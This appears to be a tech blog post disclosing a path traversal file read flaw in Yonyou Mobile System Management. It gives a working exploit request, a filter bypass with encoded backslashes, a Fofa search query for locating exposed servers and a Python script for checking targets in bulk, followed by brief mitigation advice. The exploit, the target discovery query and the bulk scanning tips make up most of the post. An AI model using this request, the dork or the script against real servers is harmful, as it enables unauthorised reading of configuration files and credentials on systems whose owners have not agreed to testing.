Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

Yonyou Mobile System Management Arbitrary File Read Vulnerability with Batch Verification PoC

Tech 1

The DownloadServlet endpoint in Yonyou Mobile System Management contains an arbitrary file read vulnerability. A attacker can craft a specially formatted HTTP request to retreive arbitrary files from the server, including sensitive configuration files and system data.

Affected Endpoint

/mobsm/common/download

Proof of Concept (PoC)

GET /mobsm/common/download?path=..%5cwebapps%5cnc_web%5cWEB-INF%5cweb.xml HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Connection: close

Note: The path traversal uses URL-encoded backslashes (%5c) to bypass basic input filters on Windows-based deployments.

Fofa Dork for Target Discovery

app="用友-移动系统管理" || (title="Login" && body="移动系统管理") || body="../js/jslib/jquery.blockUI.js"

Batch Validation Script (Python)

Below is a lightweight script to validate the vulnerability across multiple targets:

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


def check_vuln(target):
    payload = "/mobsm/common/download?path=..%5cwebapps%5cnc_web%5cWEB-INF%5cweb.xml"
    url = target.rstrip('/') + payload
    try:
        resp = requests.get(url, timeout=8, verify=False)
        if resp.status_code == 200 and '<web-app>' in resp.text:
            print(f"[+] Vulnerable: {target}")
            return True
        else:
            print(f"[-] Not vulnerable: {target}")
            return False
    except Exception as e:
        print(f"[!] Error accessing {target}: {str(e)}")
        return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 yonyou_poc.py <target_url>")
        sys.exit(1)
    check_vuln(sys.argv[1])

This script checks whether the web.xml file is accessible, which typically indicates successful exploitation. For bulk scanning, integrate this logic into a loop reading URLs from a file.

Mitigation

  • Apply input validation and canonicalization on the path parameter.
  • Restrict file access to a predefined safe directory using allowlists.
  • Upgrade to latest patched version provided by Yonyou.
  • Deploy a Web Application Firewall (WAF) with rules to block path traversal patterns.
Tags: Vulnerabilityfile-read
Back to List

Prev: Implementing a Dynamic Sequential List in C

Next: Building a Scalable Storage Layer with JuiceFS, Ceph, and MinIO

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top